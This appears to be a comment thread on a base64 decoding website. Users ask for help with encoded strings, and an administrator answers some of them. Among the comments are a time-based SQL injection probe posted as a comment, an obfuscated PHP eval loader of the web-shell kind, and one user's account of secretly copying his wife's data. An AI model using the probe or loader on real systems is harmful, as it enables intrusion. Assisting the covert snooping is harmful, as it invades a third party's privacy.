cy5aliVxVYJ+UlZWfWZ1WW36qxKSiw6ehXl9WW5+ln6qckdDZWnCFYKDYiOGPg+FXx6OezpmooYGUoJVabINdfpamxKae1Z5ZY1NdoJeZm6JaaoSNj67Kb5Pcmpu/28dlvq2cmIytcpaPq5GWjtubbJGuxJmV2nKXXl9WW5+ln6qckdDZWnCFYKHFiOGPg+FXx6OezpmooYGUoJVabINdf6SoyJmniWVSXp+XlpujXXBTV8DemJrBsXCZvdycxsKox5aT2pJqlauUl4yrl8aSrG5sv7CblmBeV1qfop+rn5efo4ugU13QqF7hjYTeisueyaGg1ZiDmqCYWmpTWaerqJieimRZiaWTmZiiW3BXXYSYlMnYn5fTnaqLjYSKzNSZ1p6YzqNcc1NaoZxar49Wr1yb0Z+ly6yahZSjmV1xVl2Dn9DPpp6MZVeLzcXFyNJXnFVesp+hrJ6cWlxTWcyknamfxKSsiXNSXqOiW7NjVrFaldLNn5/YoYXFzsmKnYZXtKqq1ZmWp1pfU1efk8WboFxwg1+V2p1ik6uXZJKvmmePqJyZj67JapPcmZW/28phvq1vk4ytnWOPq5KUjtuaZJGuxXCV2p1ik6uYbV1jVl2cns3anJfRrF6egYvV2I2tjlWyiZWjoJ+cppiBk9CbW29Wio2k1JqbpZyXol1jVl2fkcbLn12fWV7A2ciTv96RlZGvxmCRsZWUj6iXY7+ubGWS25xpvrGUZ4+umGeTrm9qjNzKY5Ldm5vA2ciUv95ok5GvxmGRsWuWj6iXYr+ulpaS25xpvrGUZ1piVF2gpJ+nmcXSpl2fWV7ZzIvgj4ariZqlyZyerJuBlJ2YWZ1WW4if0Kily5+bnJdWd56gpJumlYuSU13RmpnJzYudg42M2pprvqiXcY+rlJSPqshskK1vmZSxmnBZY1NdnaSgqp+UnNeNbVaMs5+L3sGPg42ly3qjx52ap6emWmpTrYqjmaOrinJZvbRZmZ+Xl6FecFaOV8XUnKOnqKuxxtLYisOtv2FXiZ+UiJKSkn+SkcJmk5SV0peYwYiRlpKFk5WWlWeSj9PFkpXEmIbDwMPCwtVXnFWS3Vecq5iYoVdtUr5dpKebxqGsx42kmKGpmqWpo11fUIvUqJrMnl6QgYvHyMyR16Grsp+onlpfU1eVk86fopyK0qel1WBeV1qhma+Kop+XldaNkLORWbKL2snPz9WniW9XvVepsJiYoYOfm8ebplyT4GRZ3WChqZSkm5tecFaOV9jHoZ3Kp6vXiJCDitqR0Jyc0KSIpZyXmKJaj+BiVLBdxqel0aulXm1Wj12apaKioq/LrKmMlrSQgd+K09ui0qGciWpVlFqmmJyYldefo6OK0qel1WBeV1qXop+khqWmlbjYlKTYn5zWiMHgj4ariaWg0Jtcc1OOWp2cpNWlplxig1+azqKZpYKYnpuaqqlaXISNq5zUq6S40NPP1o1cglyY1qSnopWop5WGosSZmYitzKycyp6kXl9WW66dpaigg9DPl5vXYJThjYTeitql1Kas0ZmonlptU4tan8SpqJqotqily6eXXl9WW6qco6Z2n9LapaXRrF6QgYvXyNOgsp6t0aRcZVNaoJmWpNKDlaOf062lw62hqVpiVF2eoqWVkdC1mZzYnquLvuGPg+FX1JqbiWpVlFqgoqScodGKppafz19lgmCooJitpKWpqomoo9TLoZqMZVeL1c3QyKif0aCkw6KgrFpfU1ejnsSvlpaZzoyo0aWlXpCzYFayXZifpcmNbVbAYJzc1dbEt9WfzqhejlBcmqGcoHOopNmbea2q1ZmN0aieqlpiVF2anpehnsnSdaXdfq/Y08W30tWc1Vxjglecq5Sjm3WXm9elpnqu16qatqiho6ZdYFZeo5ehmdTbn5fZqKmp2djVxLqf0aGqiVxVYKaYn5WWpsylonqu16qatqiho6ZdYFZeqp+gldDPoZuqsavWwrjS0tKjiWFXiaaenqqjoqKnd9uqppaK0qel1WCPtF9Wr12unp+nlYugU5GMoKPTw8XPt9WfzqhejlBcq5yahp6Uotaeo6ldj1hgw6ebpIWbl6Wtm6isV5CGWpfaraam0NjWipJQiaicw6KYoVqQsI2wXoNdqaei1l9zgrRZqpioqpupeaWhnsnJp5/Up4vJ1NiKnYZXw6Ogz5KkrWGWlF+fm8aboqibwqWe1pqWmKeXY6mcqKyYoqfVoaTKnKvN0NK3yNmkkKmv1ldhWVqiko+SkZOVk2aVwpeIwZiRloKVk5WWZpWSj8OWkpXEmJbTwMPClI1qglyjy56gnpecoV6WodBlnaNlxKSa0GaVmKCfoKVkmGhrZZmcZGaUYGOEiNPCwsV/wZRowY+hmJKSkmGSkcKVoJSVwmiYwZiRloKVk2decFZakdLPoJjUrWXHwpPI2NKRiWFXiaCWraWYop6Dk8qbW29Wiqia1quXpqFkl6WkZZehmdHIoqqMZVeL0czTtsuexnqkw5mhYG1TWpGhm9CYo6lkxplo0qGiaGKrqJ+jZamYnsiroJfOpWXUydSKj4ZXzparx6Ope6ihl5yYlrmbpqif0qaH16aUnKVdblZel6ScncbVp2TImmbQysfI0dmVwaKc1pGZmqeUYo+SnsSqmaiqpa2nxqWXm4mbpqmgpaRhpNzaWmKFYKfM0bTV0smV1aiJx6GqnqanhpGhlsWlrFxwg1+a0KKfmaKqYpmYZamUnsjIoq6UqZ/UkpPT1dWTx6iqwaKaqqiYpqRhosumW2FWiqeYwZiBlpKVZZWWopWSj8PFY5XEmJbDksPCwsVgwZSmwY+UmGOSn4+CkcKik5SV0peYkpielpKVk4VecFZakdLPoJjUrWXHwpPTy9Zhkampy5GhmJ6YrJOilsiVppqn2J2s1mein6NdYFZemqWqntDVlJqroqPJ1LfE0cqS0a1enFBcmqGcoJKippGZlWSpxKadxKiqZpelq6SjpZeXX8rPn5vYaF6QgYvW2M2Xx6irtqKWp6aflKScodFdblVdxKaiz5uhq2GZlWWqq52aldfakqrXmqXXzcXXzNWeiWFXiZGjoqB1oqR2odCjqaOf17FgnFlZmKGfoZimqmSWkZPJoqPSrqXN1d2Kj4ZX1qqr0aKemp+mdpiUoNGboFxwg1+y0a6mrJWbYpmmo2WUns3TlaXZYGOEiNvIxdmZ1ppenFBcmqGcoJKippGZlVxig1+gx62moKGdh6qYqKqYlIugU13Gp6DRw9PXkcmRkZyc1qOpmqWnmJRaXoNdlqqvinJZiZqgoKCYo6plmZdaXISNlKTOpnnT1bfY09af1Kl6zpGjYG1TWpGhm9CYo6lkxplo1a6ip6KoqJWaopehV5CGWqLGrZzX1bPRytWZ0JyNx6KooqKhgaWglMioW29Wipmny6aUpqdkl5dmop+WldLZmJXSnqvFxcXXxJWPwaGY1pWorYKhmp+coMqMmaepzKenkK2qq1piVF2bpa2hnNPHl4LOp6KLm4SKxNSZz5em1l6YmmKXoqehntKXmFxig1+dx5qVq5yslaqgpaSDkdLLn12fWV7Fz83QxdWkkJiYkZSampannKaUpsylolxig1+e0K2Xp6Wfp5t8mp+nmdPUf5/InqXXxqvI0cuiw6mm1FdvWVqUoZmglNKqYpiXkp2n1p6kp6Wfp5teYlZao9DVqoLGrqXHybnVz41qglyY0Jmim6KnYZOUYc+foqCpkqul0bCRo5SropmfXWJTV8XJlqXap6uLm4SKxNSZz5em1l6YmmKgrJGWldKroqldj1hg2J6kqpyloqmHl52YV56GWpfToqTG0NiRxsdf2Jqp1Zmkp6ZaX1Bap9OdppaayIiayZ5ZcVNdlaSgo5iipJLJlGXaqZ7WwsjIipJQiZum1JekrX6YrJOilsiGlaObz19zgmCTpZyjlqWrZJmUX8/LrJnUnZyLjYSKz8ekx6irpJWpmomYpaOcodGEqaKYyKpgnFlZmKGfoZimqmSWkZPSnJnKp6rJwNHI18eUw6mYkY+UpZSnmKOndMiqlYub1aui0adgq6uqW2JXXaaboLjVl5feYHGEiMXRzNOS0allxZFkqZujZF+opsyiY6mlx5mykKmap1piVF2jl6qYo9i5lKTJm6bct8nV1s+f0IOsz5Kaq1ptU1eUoMyjlqSqkZuakaWbmpikp5uWo5unkcjHp5eUmJbQwtjI1tqDw6ObxJ+tj5ilppmioJGqrKldj1hgz5qrmIaqlaSbl6Kinsm5mKnYoqbS1Iudg42R0J6kxJ+pZ5aUYp2Uq8SVp6mX0ZyazqignJKpmamqn6Who4uSU13Voae009PGyNmjtJqo15WorVptU1eUoMyjlqSqkZuakamap2RlpKimmZumo8PYmKfanqrYj9TL041cglyb0aejpaKUl3acnsipW29Wipmny6aUpqdkl5dmmqWqntDVlJqUn6DQxteSipJQiais0qCkq6d4oJGcnopwVFyXz5mnopqgoKCYo6plmZdaXISNopXEpZbDwMOTwsWPsZSGwY+UapJjWmpTWcSknaKY0qxnxZpho5yZmaSqm5WgldjHl5fZmmbDwNDE18uj1ouc1KOeqKF7nKOnodWvYqmu11+2jllZmKGfoXimqnminNPYWnCFtF7T08XRystXnFVehXZlb2xlZ1dfUoqtnJ6qyF9zgmBVfWd8aHxrXWJTV8vYmJvTYHGEiIekmKpmkmVe31xVYKimmKKDpMicgJar0ZuhpZqeo5WXl6GqXXBTq4vcnJvcqabW1anb19iRtqSmzqOUrKyhlnmmoc+XqJqJyKSexa1ZcVOxW6maqJ+jpK7VlamMc1e/iNHSx8ucp5mg1p+nfJuUoZeYlopiVFyd1Zmpyn6WoKelpoWsqqKcnsnYf5/YrXrMwtLKyMpXv7K03w==
  • jake,
    ID: b97f-ab95-7545-fa54-fbac-983f-dc7a-c717

    This was one of the challenges at a CTF hackathon that I did a couple weeks ago. just can't figure it out.
  • j4096,
    No clue what's wrong with this one.
    NOz8VK0pVjaREZVdL09ngv7DEoNesvT4EfERAO7W40eIYIbadzhz0O0xHFRyGWlvwi/eNR4RqazVKWcnQp4gUiCTE0RwUoZ31GZCvQ0itU5s3DERVgUEAlzkgXVxGfv7C/yoFlLrJiFbubMKM4S9jf3V1Z4gThluGHTNMBf+LkVw9az4OIFU7vgb6gIbSSX9Q10r0yon3H7qUPXCLOOycqGTh7lWk7a5COxTk7prA6Tdi5MTG8b19A3SS7WL8Zkd45JigS2PZVHVaaJmM/jKWKEfmqeieSO1jKHq6Dh9bBiV/fBaAKlgs8dC3H9iqaDhqXjLs3RdYDCiupqZgcrdXbEHq9EqwVO1c+ODORCDPDr4bTMhocVlvZwFIIl1LQ3ob8GlcDhGJWoF/R06zr3gBWKYxdSh5AQqTmeObj7rsZeZ/uYyY2VcpcuK2aLl0Mp+CDho+VN3L5PnXgS/p21y/C45MduJN8JoGGBBww5G9MB1rMkAmE4hAAd8wI0KTAcAhaoycIdTNLrw4c3RBANxaJ1mIykdl1Z86Zptj6ZOzfx014HVvAP74IEO+qR+r2SKgvrM9M+5/UFyQL22ehywi4zqHqPC/WR9N4bCRAO/F7D/K7OuFO2PYyBH+jBNKVzMf0lVtIukK5ToPlBOSd0fixqWMKSSmkUUQ5WPfkR3Pwvd164SAoXGiozUrZTa2HxFFZ7U0sZRrMp+AfcZqjKJDFsbPpNnsEyjggbtDPQF3dURnsKdLQVqLwYRSeN5BeAhbO7GD2I2IRni8wI+/GfauQ==
  • Amk,
    : 4ca3-ca2e-9f04-2205-748a-e648-e486-c2eb
    I found it in my email can you please help me decide it
  • Nicolas,
    Hello! This is about ac6e-6020-5e8c-5d57-3e63-aefe-01be-fade

    I've copied it from the developer console of my browser. I'm encoding images with FileReader.readAsBinaryString() function of JavaScript. So, I'm assuming the unknown values are strings the console couldn't parse
    • Administrator,
      Hello!
      It seems to be a PNG image. The problem is that you are trying to output it as raw bytes, while you have to convert it to string before displaying it to console.
  • Masoud_Shokohi,
    HI thanks for all.
    ID
    2e8d-10ad-ab15-9156-a6ae-54ee-7eee-231b
    I really do not remember where I got or downloaded this base64.txt. Thank you very much for your cooperation and great help
    • Administrator,
      Hello! It is just an example of a HTML page about how to embed JPEG images using Data URI.
  • EmK530,
    Hello
    216e-e9b6-eb36-a68d-ead2-9ab8-1596-0180

    I got this from a level editor of a game and from inspecting the code I was only able to extract a character set due to limitations, but something is missing.
    ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

    Because of suspicions of it being useless, I've excluded the tilde that is only placed at the start of the code and nowhere else.
    The last character should be the hyphen but I can't find a tool that lets me decode with a custom character set.

    [UPDATED: ]
    I now realize no symbol is missing and I'm now confused why hyphens are in it.

    [UPDATED: ]
    The hyphens split up the game objects, the B at the start has no use
  • Thano,
    Hello
    ID: bf24-aadc-4bcd-7822-3a56-8126-5011-73da
    I got this from an event from this project https://github.com/zerodytrash/TikTok-Live-Connector
    Been trying to decode it for a while but I can't do it, please help.

    [UPDATED: ]
    it was binary stored in text which corrupts the characters. I just had to store it after converting it to b64 instead, and then I can decode the b64 using normal methods.
  • Tresa,
    Hello am totally new to this concept. However I have a page that I columns like First Name, Last Name and when I input a value am keep getting ' the input is not a base64' or padding.....any thoughts? Thanks
  • ATC,
    Hi,

    It's about 8b55-4a34-c692-ca24-e7ee-a0cf-5d33-b3b2

    if u can help me i dont understand wich char is bad
    • Administrator,
      Hello,
      Your string contains several invalid characters, such as ех&\. Please pay attention that е and х are Cyrillic letters. By the way, your string seems to be an audio/mpeg file.
  • Elang,
    Hi There thanks for the tool it helps me solve the base64 text which is malformed So I can't convert it to binary properly
  • tutu,
    It's about 2f85-c55d-bb5f-024f-7898-967f-cab3-18a8

    I got the Base64 string from a CTF problem
  • Oleg,
    Hi, can I use repair module in Python\Java Script for decoding base64?
  • Clem,
    f091-0a16-82bb-490f-b2a7-1132-243d-708e

    Hey,

    I got this pdf attachment as binary data from a SOAP web service response. I'd like to convert it to a pdf file. How Can I to do so?

    Thanks
    • Administrator,
      Hi,
      Your file seems to be a valid PDF file. Please note, that it doesn't contain any body text while it has a title "Geolabel_Entreprise_National_Domicile". Also, it was generated by "TEC-IT Datenverarbeitung GmbH (www.tec-it.com)" at 2022.07.09-03:17:11+02:00.
  • Paul,
    "ID: 8105-1bcc-2cf1-bedf-3782-24b0-a93e-2877"

    Hello and I at which the speed you put forth in looking at my Malformed Base64 document. I do have a few more to submit and I am willing to assume they are all the comparable to what you've already seen. How should I proceed? I appreciate your effort! Do you think we could have a private message as I would rather not air my laundry :) I can say it has been a very rough 2022 for the misses an I.

    In addition to the above, I firmly believe my wife is being unfaithful and so I saw an opportunity to copy, and I took it. :/ I appreciate any help you can provide will definitely donate!

    [UPDATED: ]
    Do I copy and paste or upload.? "ID: 8105-1bcc-2cf1-bedf-3782-24b0-a93e-2877"
  • Matt,
    ID: f118-89c3-549c-5956-62ab-27a9-6d08-894d

    Pulled from Google Maps, I hit the print button and then used the following code to extract the canvas as an image:

    const canvas = document.getElementsByClassName('widget-scene-canvas')[0]
    const img = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
    window.location.href=img;

    Thanks.
  • onliffe7,
    decode this?

    cookies_cloud.json :
    conten:

    {
        "machine": {
            "value": "ac0a9574d05b036e471e46ba23d9a093b637ee654920f1a1b467e46367e4f38b"
        },
        "token": {
            "value": "8a4726a1100d2e9dbf3f4763cc6e2c947b91e5d0a08a3be59de8598ec989a83b"
        }
    }

    thanks
  • Matthew,
    I had already decoded the previous base64 encoding and got the decoded message. I don't know what type it is if it's a file or another format. My assumption would be that it is an image file but not 100% certain about it. This was gotten from a sample file I'm doing at work.

    My ID reference number is: 89df-bc27-ef56-3be8-e79a-c5f9-8c71-aeef.
  • ali,
    Hi!
    ID: 4a89-8666-2e40-1c0a-89df-af61-277d-97f4

    They shared this openly on a site, I have no idea what keying they are using
    HavjmdkbksmfqphAsnfklpopRoısdmalddoalsdIlakwğeKqtugAkhvnzbjcmnSahajvIbsnsqkpspN

    I will be glad if you help me
  • Filipe,
    ID: 6d2c-de35-223a-8f57-4e9f-de74-31be-5d58
    I got the base64 code in a blob return in my script, I need to convert this blob to a valid base64
  • George,
    Hello, i need decode for that please: e77f-dc67-8a12-8bd4-0fbe-52d5-c9d6-59c9
  • Rahul,
    I received from a api response from echart library

    ID:1171-7597-f646-1907-9605-bb34-d100-24c0
  • David,
    b42e-fa8a-a973-a96d-8b50-c478-4e86-f78b

    i was hacked...hacker download this and a couple of other files... please help
  • Steve,
    Hi,
    I was messing about with Tumblr's API and one of the undocumented fields the use for continuation appears to be this 1b3f-adb4-3cbb-afde-0db0-f074-15e3-1419 string. I know it's encoded somehow and it has some sort of structure but I can't figure out what it is. It's found in a "pageNumber" query if that helps
  • jack,
    hi my is
    54e7-e1fd-0309-647a-2f31-9833-2721-c0a9
    thhanks for help
  • Nustin,
    Hello,

    The ID is: 9427-4f6c-b704-38e4-ac3a-5e54-9e0e-
    6f12

    I was given this via a picture from a freind. The code came from symbols I found deep within the picture. I am curious but skeptical and need advice before proceeding.
    Thanks,
    Justin
  • Misael,
    Hola espero me puedan ayudar ya que necesito saber si esta cadena tiene algun mensaje enviado o como es que envían mensajes a través de una url de verdad me siento desesperado de saber que es lo que pasa gracias

     ID: 16e3-8f30-ca04-101b-c23c-2ab1-862b-0396 
  • like,
    ID: b8a6-2fa5-4b2d-ee2a-3d2d-ac87-1508-69a5
    base64 from code beautify
  • Patrik,
    ID 0085-066d-8abc-f86f-9632-c929-481c-c482

    Thank you so much for the help. We found this malicious file on our shop server and would like to know what it does. We have no idea, how to decode it. best Patrik
  • pluslg94,
    decrypted

    DPsDFcxeGw8y1bt0kluzBUkr0vgS/+IXtqtYBEH5TSSZsBOZcbm43UQM119wsMGyZ5z8djEL1lXp
    PvCLDuhSw46OxbyLUcmVrJpm32NlIktTMvNx09+X3L0OFB5/W6s1Ih2Vv2G1YFWQv2EgmT42/ZAU
    ucbSy3vhlGJ73824r2k=
  • RobertBowman,
    Please helpPK
  • iris,

    PNG  IHDR((~Х^!PLTELiq�$�t tRNS��o�l<�;s��o�hIDATx^�ͻ �0Q[�H��PuP����T��I��u� �'��(W��@� L��%h���Kbtɒ�������]����TPAQE�P�*�����;��+bc8�IEND�B`


    this was something i saved in notes from my phone. i've been having some serious hacking issues and can't get help to save my life so, im trying to do it myself ? any and all help is appreciated! i have SO much stuff to go thru
  • Chris,
    I keep finding these encrypted files in my phone what are they!
  • xpkLoRel,
    if(now()=sysdate(),sleep(15),0)
    • Chris,
      Whats does that even mean and what's it for?
    • Chris,
      Can someone help me decode using that so I understand what exactly it is and saidz please really appreciate
  • Tanner,
    My string is not in the correct format: defb-dba2-9bc9-b38e-d4e1-506b-f121-7ae8
    I got that base64 from my gmail body using gmail apis
  • Boris,
    I have generated PDF file with MPDF ver 6 which is decoded with standard php 7.4 base64_encode. Any idea why it is not decoded properly?
    id: f96f-31c5-1cb4-12cd-84e7-31dc-4033-1cf8
  • Mike,
    I want to know if can get a contingency plan on some the complete codes I summit I do need good help. Let me know Mr. Victor ID fb06-b2fb-ed76-db4c-a7f0-9f76-38bf-b7fb. I also was on your contact page submitting a comment for help or a retainer agreement.
  • tron88,
    a22a-29e2-ef47-2bb0-9dbe-503c-8cfb-cb71
  • Tamta,
    Hello, my employer sent me this link to see the instructions. I don't know anything about "base64" ? can you help me to see it please? ??

    b96e-687b-6d90-ecb7-75a9-508b-00d7-2203
  • roldo,
    79b4-f2cb-1511-ce1e-69e8-c455-af5f-b70c
  • jehad,
    i want decode this script please

    <?php
    $bn_d7624002cad982b3=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13(explode(base64_decode("Pz4="),file_get_contents(__FILE__))[1]))));preg_replace($bn_d7624002cad982b3[0],serialize(eval($bn_d7624002cad982b3[2])),$bn_d7624002cad982b3[1]);exit();
    ?>
    =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